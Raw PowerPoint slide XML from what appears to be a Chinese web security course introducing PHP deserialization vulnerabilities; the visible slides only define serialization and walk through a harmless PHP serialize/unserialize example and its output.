              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14BFBC09-77C6-FDB9-976D-CB68EF13C880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="276636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椭圆 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6A4A0F-C8D9-46D8-AE4E-EA233CC0550D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="362361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4" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9386E3D3-4746-DCB4-649D-1712C374267A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="4480867"/>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5" name="矩形: 圆角 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C98A8157-0F89-08EA-38F0-4BB05BABD9D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54FFEC1D-5A35-9627-2131-374806697E14}"/>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876F8D78-F1C6-6C1C-6811-50385E03F24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Block">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C610F729-0A67-C06A-A8C5-E0EBF770901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ypeText">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5175E58B-2518-0706-8824-C5432B891CC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15336021-9A88-A8D4-D26E-686CC1465F0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91677AF-8B82-6510-0C20-0E4A80E66F50}"/>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05847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B43764-E041-9757-36BA-9EB80FCBD27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1720054"/>
            <a:ext cx="12192000" cy="2376264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0048AA"/>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6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  反序列化漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3670206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反序列化漏洞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48245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序列化</a:t>
            </a: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3519618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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序列化是指将对象，数组等数据结构</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>转化为可以存储的格式的过程。</a:t>
            </a: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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序在运行时，变量的值都是存储在内存中，程序运行结束，操作系统就会将内存空间收回，要想将内存中的变量写入磁盘中或者通过网络传输，就需要对其进行序列化操作，序列化能将一个对象转换为一个字符串。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="20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19"/>
            <a:ext cx="1415772"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反序列化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FC34DC-A083-3365-0CC1-4B97B53F3666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1725578"/>
            <a:ext cx="4824536" cy="826637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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将序列化后的字符串恢复为数据结构的过程称为反序列化。</a:t>
            </a:r>
            <a:endParaRPr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6234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反序列化漏洞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48245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序列化</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3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>class</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267F99"/>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private</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$flag</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"flag{233}"</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public</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$a</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"aaa"</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static</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$b</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"bbb"</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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00FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>new</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267F99"/>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00108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$data</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>serialize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1080"/>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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>echo</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$data</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19"/>
            <a:ext cx="1734770"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序列化结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B7C34E-13ED-515B-76AA-5AAB6E3F02C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6425246" y="1725578"/>
            <a:ext cx="4824536" cy="3904402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="pt-BR"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O:4:"test":2:{s:10:"testflag";s:9:"flag{233}";s:1:"a";s:3:"aaa";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="pt-BR"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代表储存的是对象</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object)</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代表类名有</a:t>
            </a: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4</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个字符</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"test"</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代表类名</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2</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代表对象中变量个数</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s</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表示字符串</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10</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代表长度</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25000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"testflag"</a:t>
            </a:r>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是类名及变量名。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19693915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反序列化漏洞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48245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反序列化</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F872ED2-71E8-7C41-B5F8-3757A5012F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1155219"/>
            <a:ext cx="2031325" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>结果</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3FC34DC-A083-3365-0CC1-4B97B53F3666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788307" y="1719590"/>
            <a:ext cx="5104569" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>class</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267F99"/>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private</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$flag</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"flag{233}"</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public</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$a</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"aaa"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    static</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$b</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"bbb"</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>serialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>newtest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>($data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>newtest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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A637BA97-726A-98AD-F046-0E6EBD92B011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6320671" y="1725578"/>
            <a:ext cx="5111750" cy="1791965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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object(test)#2 (2) </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 </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flag":"test":private</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]=&gt; string(9) "flag{233}" </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["a"]=&gt; string(3) "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US"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aaa</a:t>
            </a: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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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5361388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反序列化漏洞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3" y="1052513"/>
            <a:ext cx="5111750"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4824536" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
